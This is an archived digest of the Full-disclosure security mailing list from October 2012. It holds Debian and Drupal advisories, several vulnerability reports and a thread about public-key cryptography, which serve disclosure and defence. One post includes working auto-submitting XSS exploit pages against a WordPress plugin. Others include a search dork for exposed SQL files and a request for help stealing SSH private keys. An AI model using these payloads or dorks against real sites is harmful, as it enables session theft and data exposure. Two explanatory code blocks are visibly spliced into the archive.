[Full-disclosure] SEC Consult Vulnerability Lab Study - Application Security of Core Banking Systems - A first reality check

2012-10-24 Thread SEC Consult Vulnerability Lab

SEC Consult, an international leader in application security services and
consultancy, and Capgemini, one of the world's foremost providers of
consulting, technology and outsourcing services, released the first
international study on security of 3rd party Core Banking Packages.

The study summarizes the vendors' promises, commitments and relevant
activities relating to the application security of their products. As a
'reality check' three Core Banking products have been tested and severe
security vulnerabilities not detected by the vendors have been found in each.
The study emphasizes that state-of-the-art application security has to be
demanded and consecutively validated by application security tests. Failure to
do so can result in the implementation of insecure software products and incur
operational risks.

A summary of the study can be found at our blog:

http://blog.sec-consult.com


On a side note, we also have a new look and new contents for our homepage:
https://www.sec-consult.com

Study information:
https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm




~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 2562-1] cups-pk-helper security update

2012-10-24 Thread Thijs Kinkhorst
Debian Security Advisory DSA-2562-1   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
October 23, 2012   http://www.debian.org/security/faq

Package: cups-pk-helper
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE ID : CVE-2012-4510

cups-pk-helper, a PolicyKit helper to configure cups with fine-grained
privileges, wraps CUPS function calls in an insecure way. This could
lead to uploading sensitive data to a cups resource, or overwriting
specific files with the content of a cups resource. The user would have
to explicitly approve the action.

For the stable distribution (squeeze), this problem has been fixed in
version 0.1.0-3.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 0.2.3-1.

We recommend that you upgrade your cups-pk-helper packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [SECURITY] [DSA 2563-1] viewvc security update

2012-10-24 Thread Thijs Kinkhorst
Debian Security Advisory DSA-2563-1   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
October 23, 2012   http://www.debian.org/security/faq

Package: viewvc
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2009-5024 CVE-2012-3356 CVE-2012-3357 CVE-2012-4533

Several vulnerabilities were found in ViewVC, a web interface for CVS
and Subversion repositories.

CVE-2009-5024: remote attackers can bypass the cvsdb row_limit
configuration setting, and consequently conduct resource-consumption
attacks via the limit parameter.

CVE-2012-3356: the remote SVN views functionality does not properly
perform authorization, which allows remote attackers to bypass intended
access restrictions.

CVE-2012-3357: the SVN revision view does not properly handle log
messages when a readable path is copied from an unreadable path, which
allows remote attackers to obtain sensitive information.

CVE-2012-4533: function name lines returned by diff are not properly
escaped, allowing attackers with commit access to perform cross site
scripting.

For the stable distribution (squeeze), these problems have been fixed in
version 1.1.5-1.1+squeeze2.

For the testing distribution (wheezy), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 1.1.5-1.4.

We recommend that you upgrade your viewvc packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] [SECURITY] [DSA 2564-1] tinyproxy security update

2012-10-24 Thread Thijs Kinkhorst
Debian Security Advisory DSA-2564-1   secur...@debian.org
http://www.debian.org/security/   Thijs Kinkhorst
October 23, 2012   http://www.debian.org/security/faq

Package: tinyproxy
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3505
Debian Bug : 685281

gpernot discovered that Tinyproxy, a HTTP proxy, is vulnerable to a
denial of service by remote attackers by sending crafted request
headers.

For the stable distribution (squeeze), this problem has been fixed in
version 1.8.2-1squeeze3.

For the testing distribution (wheezy), this problem has been fixed in
version 1.8.3-3.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.3-3.

We recommend that you upgrade your tinyproxy packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress

2012-10-24 Thread Troy Rose
Its a bit like having a security alarm for an open door, IMHO.

On 20 October 2012 04:37, Philip Whitehouse phi...@whiuk.com wrote:

 Hmm,

 Another 'security' plugin with vulnerabilities...

 What exactly is the point of them? Even in an ideal world surely WP should
 be secure anyway - doesn't it just increase the attack surface?

 Philip Whitehouse

 On 19 Oct 2012, at 18:16, MustLive mustl...@websecurity.com.ua wrote:

  Hello list!
 
  I want to warn you about Cross-Site Scripting and Insufficient
  Anti-automation vulnerabilities in Wordfence Security for WordPress.
 
  Wordfence - it's a security plugin for WordPress.
 
  Affected products:
 
  Vulnerable are Wordfence Security 3.3.5 and previous versions.
 
  Details:
 
  XSS (WASC-08):
 
  Wordfence Security XSS.html
 
  <html>
  <head>
  <title>Wordfence Security XSS exploit (C) 2012 MustLive.
  http://websecurity.com.ua</title>
  </head>
  <body onLoad="document.hack.submit()">
  <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
  <input type="hidden" name="email"
  value="<script>alert(document.cookie)</script>">
  </form>
  </body>
  </html>
 
  Insufficient Anti-automation (WASC-21):
 
  Wordfence Security IAA.html
 
  <html>
  <head>
  <title>Wordfence Security IAA exploit (C) 2012 MustLive.
  http://websecurity.com.ua</title>
  </head>
  <body onLoad="document.hack.submit()">
  <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
  <input type="hidden" name="email" value="ad...@e-mail.com">
  </form>
  </body>
  </html>
 
  I've informed the plugin developer about the vulnerabilities, and mentioned
  these vulnerabilities at my site (http://websecurity.com.ua/6106/).
 
  Best wishes & regards,
  MustLive
  Administrator of Websecurity web site
  http://websecurity.com.ua
 
 



[Full-disclosure] Grandstream GXP1405 Executive IP Phone Persistent XSS

2012-10-24 Thread Are You Likeme Now

             title: Grandstream GXP1405 Executive IP Phone Persistent XSS
           product: Grandstream Networks
vulnerable version: 1.0.1.110
            impact: Low
          homepage: www.grandstream.com
             found: 23.10.2012
                by: aulmn

Vendor description:

Grandstream Networks is a leading manufacturer of innovative IP voice/video
telephony and video surveillance solutions


Vulnerability overview/description:

This is cross-site scripting for logged in users.


Proof of concept:

Go to your http://ip.of.tel/cgi-bin/login and log in.
Next, check the card called 'Accounts'; the vulnerable parameter is P134.
Click 'update' and once again 'continue', and there your XSS is triggered.
Parameter P2318 is vulnerable too, so I suppose there are more vulnerable
places.

The 'Conference URL' parameter is also vulnerable to persistent XSS.
So if an attacker gets your (default? ;)) credentials, he can set a
persistent XSS to attack you.


Vulnerable / tested versions:

Software Version 1.0.1.110


The vulnerability is verified to exist in ...,
which is the most recent version at the time of discovery.

Older versions are probably affected as well.


Vendor contact timeline:
Nope.

Solution:

Please validate content delivered by your users.


Advisory URL:
Maybe later.

_
Contact:
areulikeme...@gmail.com

Re: [Full-disclosure] Google Numbers Search

2012-10-24 Thread boardnerd
 So... Google really does let you search for any number...

 http://www.google.com/#q=1..9+filetype:sql
 :(

 http://www.google.com/#q=10e7..10e8+filetype:sql
 :)

I wouldn't count on the second one being allowed for much longer now that
you have posted it here on FD.





Re: [Full-disclosure] Microsoft Office Word 2010 Stack Overflow

2012-10-24 Thread Mario Vilas
stack overflow != stack buffer overflow

On Wed, Oct 24, 2012 at 3:41 AM, kaveh ghaemmaghami 
kavehghaemmagh...@googlemail.com wrote:

 Title :  Microsoft Office Word 2010 Stack Overflow
 Version   :  Microsoft Office professional Plus 2010
 Date  :  2012-10-23
 Vendor:  http://office.microsoft.com
 Impact:  Med/High
 Contact   :  coolkaveh [at] rocketmail.com
 Twitter   :  @coolkaveh
 tested:  XP SP3 ENG

 ###
 Bug :
 
 Stack overflow during the handling of the doc files; a context-dependent
 attacker can execute arbitrary code.
 

 
 (be0.59c): Stack overflow - code c0fd (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00032000
 ebx=
 ecx=00032fe4
 edx=24bc
 esi=008b8974
 edi=0753e000
 eip=316d458e
 esp=000380f0
 ebp=000380f8 iopl=0 nv up ei pl nz na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
 efl=00010206
 *** ERROR: Symbol file could not be found.  Defaulted to export
 symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll -
 wwlib+0x458e:
 316d458e 8500testdword ptr [eax],eax
  ds:0023:00032000=
 0:000> !exploitable -v
 eax=00032000 ebx= ecx=00032fe4 edx=24bc esi=008b8974
 edi=0753e000
 eip=316d458e esp=000380f0 ebp=000380f8 iopl=0 nv up ei pl nz na pe
 nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
 efl=00010206
 wwlib+0x458e:
 316d458e 8500testdword ptr [eax],eax
  ds:0023:00032000=
 HostMachine\HostUser
 Executing Processor Architecture is x86
 Debuggee is in User Mode
 Debuggee is a live user mode debugging session on the local machine
 Event Type: Exception
 *** ERROR: Symbol file could not be found.  Defaulted to export
 symbols for ntdll.dll -
 *** ERROR: Symbol file could not be found.  Defaulted to export
 symbols for C:\Program Files\Common Files\Microsoft
 Shared\OFFICE14\MSPTLS.DLL -
 Exception Faulting Address: 0x316d458e
 First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)

 Faulting Instruction:316d458e test dword ptr [eax],eax

 Basic Block:
 316d458e test dword ptr [eax],eax
Tainted Input Operands: eax
 316d4590 jmp wwlib+0x4585 (316d4585)

 Exception Hash (Major/Minor): 0x7513030e.0x2d6c2e72

 Stack Trace:
 wwlib+0x458e
 wwlib!GetAllocCounters+0x78520
 wwlib!GetAllocCounters+0x90f89
 wwlib!GetAllocCounters+0x134cf
 wwlib!DllGetLCID+0x6451eb
 wwlib!DllGetLCID+0x645c74
 wwlib!DllGetLCID+0x29b461
 wwlib!DllGetLCID+0x531d6
 wwlib!DllGetLCID+0x2c1272
 wwlib!DllGetLCID+0x141bf9
 wwlib!DllGetLCID+0x1d1144
 wwlib!DllGetLCID+0x1d05ae
 MSPTLS!LsLwMultDivR+0x101e7
 MSPTLS!LsLwMultDivR+0x10afb
 MSPTLS!LsLwMultDivR+0x10c5e
 MSPTLS!LsLwMultDivR+0x10ec8
 MSPTLS!FsTransformBbox+0xe137
 MSPTLS!LsLwMultDivR+0x24ac6
 MSPTLS!LsLwMultDivR+0x27d0
 MSPTLS!LsLwMultDivR+0x25470
 MSPTLS!LsLwMultDivR+0x25642
 MSPTLS!LsLwMultDivR+0x259ad
 MSPTLS!LsLwMultDivR+0x2a64
 MSPTLS!LsLwMultDivR+0x3201
 MSPTLS!FsTransformBbox+0x74ae
 MSPTLS!FsTransformBbox+0x7e28
 MSPTLS!FsCreateSubpageFinite+0xad
 wwlib!DllGetLCID+0x541fc
 wwlib!DllGetLCID+0x54037
 MSPTLS!LsLwMultDivR+0x4e92
 MSPTLS!LsLwMultDivR+0x29070
 MSPTLS!LsLwMultDivR+0x285b0
 MSPTLS!LsLwMultDivR+0x5fa3
 MSPTLS!LsLwMultDivR+0x6816
 MSPTLS!FsTransformBbox+0xb8c1
 MSPTLS!FsQueryTableObjFigureListWord+0x2a0
 MSPTLS!LsLwMultDivR+0x101e7
 MSPTLS!LsLwMultDivR+0x10afb
 MSPTLS!LsLwMultDivR+0x10c5e
 MSPTLS!LsLwMultDivR+0x10ec8
 MSPTLS!FsTransformBbox+0xe137
 MSPTLS!LsLwMultDivR+0x24ac6
 MSPTLS!LsLwMultDivR+0x27d0
 MSPTLS!LsLwMultDivR+0x25470
 MSPTLS!LsLwMultDivR+0x25642
 MSPTLS!LsLwMultDivR+0x259ad
 MSPTLS!LsLwMultDivR+0x2a64
 MSPTLS!LsLwMultDivR+0x3201
 MSPTLS!FsTransformBbox+0x74ae
 MSPTLS!FsTransformBbox+0x7e28
 MSPTLS!FsCreateSubpageFinite+0xad
 wwlib!DllGetLCID+0x1d07f0
 MSPTLS!LsLwMultDivR+0x101e7
 MSPTLS!LsLwMultDivR+0x10afb
 MSPTLS!LsLwMultDivR+0x10c5e
 MSPTLS!LsLwMultDivR+0x10ec8
 MSPTLS!FsTransformBbox+0xe137
 MSPTLS!LsLwMultDivR+0x24ac6
 MSPTLS!LsLwMultDivR+0x27d0
 MSPTLS!LsLwMultDivR+0x25470
 MSPTLS!LsLwMultDivR+0x25642
 MSPTLS!LsLwMultDivR+0x259ad
 MSPTLS!LsLwMultDivR+0x2a64
 MSPTLS!LsLwMultDivR+0x3201
 Instruction Address: 0x316d458e
 Description: Stack Overflow
 Short Description: StackOverflow
 Recommended Bug Title: Stack Overflow starting at
 wwlib+0x458e (Hash=0x7513030e.0x2d6c2e72)

 ##
 Proof of concept poc.rar included.





-- 
“There's a reason we separate military and the police: one fights the enemy
of 
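Mario's distinction is what the dump above actually shows: STATUS_STACK_OVERFLOW is raised when recursion exhausts the thread's stack (note the same MSPTLS frames repeating in the trace), not when a buffer on the stack is overrun, and the two have very different exploitability. As an added example that is not from the thread, a recursive parser of a toy nested-bracket format with an explicit depth cap, which is the standard defence against exhaustion on attacker-controlled nesting; MAX_DEPTH, the bracket format and all function names are my own assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Depth cap chosen for this example. A real parser derives it from its
 * per-frame stack usage and the thread's reserved stack size. */
#define MAX_DEPTH 64

enum parse_status { PARSE_OK = 0, PARSE_BAD_INPUT = -1, PARSE_TOO_DEEP = -2 };

/* Parses one bracket group starting at s[*pos] (which must be '['), recursing
 * for nested groups and recording the deepest level seen in *max_seen.
 * The depth check comes first, before this frame does any other work, so the
 * level past the cap is refused instead of consuming yet another frame. */
static int parse_group(const char *s, size_t *pos, int depth, int *max_seen)
{
    if (depth > MAX_DEPTH)
        return PARSE_TOO_DEEP;
    if (s[*pos] != '[')
        return PARSE_BAD_INPUT;
    (*pos)++;
    if (depth > *max_seen)
        *max_seen = depth;

    for (;;) {
        char c = s[*pos];
        if (c == '\0')
            return PARSE_BAD_INPUT;          /* unterminated group */
        if (c == ']') {
            (*pos)++;
            return PARSE_OK;
        }
        if (c == '[') {
            int rc = parse_group(s, pos, depth + 1, max_seen);
            if (rc != PARSE_OK)
                return rc;                   /* unwind, do not keep going */
            continue;
        }
        (*pos)++;                            /* ordinary content byte */
    }
}

/* Parses a document of zero or more top-level groups. Returns a parse_status;
 * on success stores the maximum nesting depth in *max_depth (may be NULL). */
int parse_document(const char *s, int *max_depth)
{
    size_t pos = 0;
    int seen = 0;
    while (s[pos] != '\0') {
        int rc = parse_group(s, &pos, 1, &seen);
        if (rc != PARSE_OK)
            return rc;
    }
    if (max_depth)
        *max_depth = seen;
    return PARSE_OK;
}

/* Returns the nesting depth of a well-formed document, or -1 if rejected. */
int document_depth(const char *s)
{
    int depth = 0;
    return parse_document(s, &depth) == PARSE_OK ? depth : -1;
}

/* Constructs n nested groups ("[[[...]]]") and parses them; returns the
 * parse_status. This is the hostile-input case: a file built only to drive
 * the recursion as deep as possible. */
int nested_status(size_t n)
{
    static char buf[4096];
    if (2 * n + 1 > sizeof buf)
        return PARSE_BAD_INPUT;
    memset(buf, '[', n);
    memset(buf + n, ']', n);
    buf[2 * n] = '\0';
    return parse_document(buf, NULL);
}

int main(void)
{
    printf("[[a][b[c]]] -> depth %d\n", document_depth("[[a][b[c]]]"));
    printf("%d nested -> %s\n", MAX_DEPTH + 1,
           nested_status(MAX_DEPTH + 1) == PARSE_TOO_DEEP
               ? "refused before the stack runs out" : "accepted?!");
    return 0;
}
```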

Re: [Full-disclosure] SEC Consult Vulnerability Lab Study - Application Security of Core Banking Systems - A first reality check

2012-10-24 Thread Jeffrey Walton
On Wed, Oct 24, 2012 at 4:08 AM, SEC Consult Vulnerability Lab
resea...@sec-consult.com wrote:

 SEC Consult, an international leader in application security services and
 consultancy, and Capgemini, one of the world's foremost providers of
 consulting, technology and outsourcing services, released the first
 international study on security of 3rd party Core Banking Packages.

 The study summarizes the vendors' promises, commitments and relevant
 activities relating to the application security of their products. As a
 'reality check' three Core Banking products have been tested and severe
 security vulnerabilities not detected by the vendors have been found in each.
 The study emphasizes that state-of-the-art application security has to be
 demanded and consecutively validated by application security tests. Failure to
 do so can result in the implementation of insecure software products and incur
 operational risks.

 A summary of the study can be found at our blog:

 http://blog.sec-consult.com

 On a side note, we also have a new look and new contents for our homepage:
 https://www.sec-consult.com

 Study information:
 https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm
Send an email to get the study? Seriously? It appears you have used
BugTraq for a press release...



Re: [Full-disclosure] stealing ssh keys

2012-10-24 Thread Jacqui Caren
On 23/10/2012 16:07, Daniel Sichel wrote:

 Hello everybody:
   environment is A is hacker client? B is target and C is Manager

 center and C have all A and B private key.

WTF! Why would anyone C or B or even A give out a PRIVATE key.
Does no one RTFM - you never ever give out your private key
and you protect it to heck and back.

   C are open 80,22. And this is http's 403 state on the C.
   I have A's root,how to steal private key On the C. Are there have
 some vuln with openssh.
   Is there some impossible which C login in to the A and B when A and B
 let C run some bash.


 OK, I am a total n00b here but I do not see how having an ssl connection 
 would help reveal an SSH key.  Our organization generates our root certs 
 separate from, and unrelated to SSH keys.. I do not see how SSL access in and 
 of itself, helps get at SSH keys, If it does, let me know, I bank at Chase 
 and that would be darn handy to know (believe me, they have it coming)!

This is full disclosure not help a student do his homework.
My advice: give him a very blatantly stupid answer - let him get null 
points from teacher :-)

Jacqui




[Full-disclosure] [Security-news] SA-CONTRIB-2012-157 - Time Spent - Multiple Vulnerabilities - (unsupported)

2012-10-24 Thread security-news
View online: https://drupal.org/node/1822066

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-157
  * Project: Time Spent [1] (third-party module)
  * Version: 6.x, 7.x
  * Date: 2012-October-24
  * Security risk: Critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting, Cross Site Request Forgery, SQL
Injection, Multiple vulnerabilities

DESCRIPTION
-----------

The Time Spent module tracks the time a registered user spends on a site and
a site's content.

The module doesn't sufficiently sanitize user input. Cross site scripting,
cross-site request forgery, and SQL injection vulnerabilities have all been
found.

CVE: Requested

VERSIONS AFFECTED
-----------------

  * All Time Spent module versions.

Drupal core is not affected. If you do not use the contributed Time Spent [3]
module, there is nothing you need to do.

SOLUTION
--------

Uninstall the module:

  * If you use the Time Spent module you should disable the module.

Also see the Time Spent [4] project page.

REPORTED BY
-----------

  * Dylan Riordan [5] (amorsent)
  * Greg Knaddison [6] (greggles) of the Drupal Security Team

COORDINATED BY
--------------

  * Forest Monsen [7] (forestmonster) of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [8].

Learn more about the Drupal Security team and their policies [9], writing
secure code for Drupal [10], and securing your site [11].


[1] http://drupal.org/project/time_spent
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/time_spent
[4] http://drupal.org/project/time_spent
[5] http://drupal.org/user/426464
[6] http://drupal.org/user/36762
[7] http://drupal.org/user/181798
[8] http://drupal.org/contact
[9] http://drupal.org/security-team
[10] http://drupal.org/writing-secure-code
[11] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news



[Full-disclosure] [Security-news] SA-CONTRIB-2012-158 - MailChimp - Cross Site Scripting (XSS)

2012-10-24 Thread security-news
View online: http://drupal.org/node/1822166

  * Advisory ID: DRUPAL-SA-CONTRIB-2012-158
  * Project: MailChimp [1] (third-party module)
  * Version: 7.x
  * Date: 2012-October-24
  * Security risk: Moderately critical [2]
  * Exploitable from: Remote
  * Vulnerability: Cross Site Scripting

DESCRIPTION
-----------

This module provides integration with the MailChimp email delivery service.

There are two issues with the webhook processing, which is exposed as an API
in mailchimp.module and used by mailchimp_lists.module to update subscriber
information.

  * The webhook URL key can be trivially calculated.
  * Webhook variables from POST requests are not properly sanitized.

Mitigating these issues is the fact that attackers cannot tamper with email
subscriptions even if they know the webhook path, because changes are pulled
in from the MailChimp API only.

CVE: Requested

VERSIONS AFFECTED
-----------------

  * MailChimp 7.x-2.x versions prior to 7.x-2.7.

Drupal core is not affected. If you do not use the contributed MailChimp [3]
module, there is nothing you need to do.

SOLUTION
--------

Install the latest version:

  * If you use the MailChimp module for Drupal 7.x, upgrade to MailChimp
7.x-2.7 [4]

Also see the MailChimp [5] project page.

REPORTED BY
-----------

  * Dmitriy Trt [6] (Dmitriy.trt)

FIXED BY
--------

  * Lev Tsypin [7] (levelos) the module maintainer

COORDINATED BY
--------------

  * Klaus Purer [8] (klausi) of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [9].

Learn more about the Drupal Security team and their policies [10], writing
secure code for Drupal [11], and securing your site [12].


[1] http://drupal.org/project/mailchimp
[2] http://drupal.org/security-team/risk-levels
[3] http://drupal.org/project/mailchimp
[4] http://drupal.org/node/1821330
[5] http://drupal.org/project/mailchimp
[6] http://drupal.org/user/329125
[7] http://drupal.org/user/54135
[8] http://drupal.org/user/262198
[9] http://drupal.org/contact
[10] http://drupal.org/security-team
[11] http://drupal.org/writing-secure-code
[12] http://drupal.org/security/secure-configuration




Re: [Full-disclosure] stealing ssh keys

2012-10-24 Thread Thor (Hammer of God)
I think you're over reacting just a bit.  You can give out your private key to 
whomever/whatever you want to be able to decrypt data encrypted with the public 
key.  It all depends on the use-case, and what you want done.  Just because its 
a private key doesn't mean it's automatically some critical security component. 
  Many times it is, but it doesn't have to be. 

t

Sent from whatever device will keep us from debating which one is better.

On Oct 24, 2012, at 10:59 AM, Jacqui Caren jacqui.ca...@ntlworld.com wrote:

 On 23/10/2012 16:07, Daniel Sichel wrote:
 
 Hello everybody:
  environment is A is hacker client? B is target and C is Manager
 
 center and C have all A and B private key.
 
 WTF! Why would anyone C or B or even A give out a PRIVATE key.
 Does no one RTFM - you never ever give out your private key
 and you protect it to heck and back.
 
  C are open 80,22. And this is http's 403 state on the C.
  I have A's root,how to steal private key On the C. Are there have
 some vuln with openssh.
  Is there some impossible which C login in to the A and B when A and B
 let C run some bash.
 
 
 OK, I am a total n00b here but I do not see how having an ssl connection 
 would help reveal an SSH key.  Our organization generates our root certs 
 separate from, and unrelated to SSH keys.. I do not see how SSL access in 
 and of itself, helps get at SSH keys, If it does, let me know, I bank at 
 Chase and that would be darn handy to know (believe me, they have it coming)!
 
 This is full disclosure not help a student do his homework.
 My advice: give him a very blatantly stupid answer - let him get null 
 points from teacher :-)
 
 Jacqui
 
 



Re: [Full-disclosure] stealing ssh keys

2012-10-24 Thread Raj Mathur (राज माथुर)
On Thursday 25 Oct 2012, Thor (Hammer of God) wrote:
 I think you're over reacting just a bit.  You can give out your
 private key to whomever/whatever you want to be able to decrypt data
 encrypted with the public key.  It all depends on the use-case, and
 what you want done.  Just because its a private key doesn't mean
 it's automatically some critical security component.   Many times it
 is, but it doesn't have to be.

That statement is deeply flawed.

A private key is meant to be exactly that: private.  If a process or 
entity is handing out its private key to another process/entity for any 
reason whatsoever, then there is something seriously wrong in the way 
the interaction has been designed.

The basis of public-key cryptography is that you (generic you) have two 
keys: public and private.  These two keys are orthogonal to each other, 
so:

A. Data encrypted with your private key can only be decrypted by using 
your public key, and
B. Data encrypted with your public key can only be decrypted using your 
private key.

With this, we can implement the two basic requirements of crypto.  In 
very general terms, these are:

1. Data privacy.  When someone needs to send data privately to you, they 
encrypt it with your public key.  Then only the person who has the 
corresponding private key (you) can decrypt the data.  Anyone else 
intercepting the message will only have junk.

2. Identity.  When you need to establish the ownership of data 
originating from you, you encrypt the message with your private key.  
Since only your public key can decrypt that message, any recipient can 
check (by decrypting with your public key) that your private key has 
been used to encrypt.  This establishes you as the originator of the 
data.

As you can see, in both cases the recipient of the data only needs your 
public key, while only you need your private key.  There is no 
reasonable circumstance under which you would need to share your private 
key with someone else.

Regards,

-- Raj
-- 
Raj Mathur  || r...@kandalaya.org   || GPG:
http://otheronepercent.blogspot.com || http://kandalaya.org || CC68
It is the mind that moves   || http://schizoid.in   || D17F
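Raj's properties A and B and uses 1 and 2, as an added example that is not from the thread: textbook RSA with the tiny textbook parameters p = 61, q = 53 (n = 3233, e = 17, d = 2753), my choice for readability, in which each party's role is fixed purely by which exponent it holds and neither the recipient nor the verifier ever touches Alice's private exponent. Key and function names are assumptions; the parameters are a toy with no padding or hashing.

```c
#include <stdint.h>
#include <stdio.h>

/* A key is just (modulus, exponent); public and private differ only in which
 * exponent they carry and who is permitted to hold it. */
typedef struct { uint64_t n, exp; } rsa_key;

/* Toy parameters for this illustration only (p = 61, q = 53): trivially
 * factorable, no padding, no hashing. The point is who holds which exponent. */
const rsa_key ALICE_PUB  = { 3233, 17 };    /* published; anyone may hold it */
const rsa_key ALICE_PRIV = { 3233, 2753 };  /* never leaves Alice's machine */

/* Square-and-multiply modular exponentiation. With n < 2^32 the product of
 * two residues fits in uint64_t, so there is no overflow. */
static uint64_t modpow(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1;
    base %= mod;
    while (exp > 0) {
        if (exp & 1)
            result = (result * base) % mod;
        base = (base * base) % mod;
        exp >>= 1;
    }
    return result;
}

/* The single RSA primitive, m^exp mod n. Whether a call "encrypts",
 * "decrypts", "signs" or "verifies" is decided by which key the caller holds. */
uint64_t rsa_apply(const rsa_key *k, uint64_t m)
{
    return modpow(m, k->exp, k->n);
}

/* Property B / use 1 (privacy): the sender needs only ALICE_PUB; only the
 * holder of ALICE_PRIV can reverse the operation. */
uint64_t encrypt_to_alice(uint64_t m) { return rsa_apply(&ALICE_PUB, m); }
uint64_t alice_decrypt(uint64_t c)    { return rsa_apply(&ALICE_PRIV, c); }

/* Property A / use 2 (identity): Alice applies ALICE_PRIV; a verifier needs
 * only ALICE_PUB to recover m and so confirm the private key was used. */
uint64_t alice_sign(uint64_t m)          { return rsa_apply(&ALICE_PRIV, m); }
uint64_t verify_from_alice(uint64_t sig) { return rsa_apply(&ALICE_PUB, sig); }

/* Checks that a pair really inverts in both directions for message m. */
int keypair_consistent(const rsa_key *pub, const rsa_key *priv, uint64_t m)
{
    return rsa_apply(priv, rsa_apply(pub, m)) == m
        && rsa_apply(pub, rsa_apply(priv, m)) == m;
}

int main(void)
{
    uint64_t m = 65, c = encrypt_to_alice(m), sig = alice_sign(m);
    printf("encrypt(%llu) = %llu, Alice decrypts to %llu\n",
           (unsigned long long)m, (unsigned long long)c,
           (unsigned long long)alice_decrypt(c));
    /* A third party holding only the public key gets junk, not m. */
    printf("public key applied to ciphertext: %llu\n",
           (unsigned long long)rsa_apply(&ALICE_PUB, c));
    printf("sign(%llu) = %llu, verifier recovers %llu\n",
           (unsigned long long)m, (unsigned long long)sig,
           (unsigned long long)verify_from_alice(sig));
    return 0;
}
```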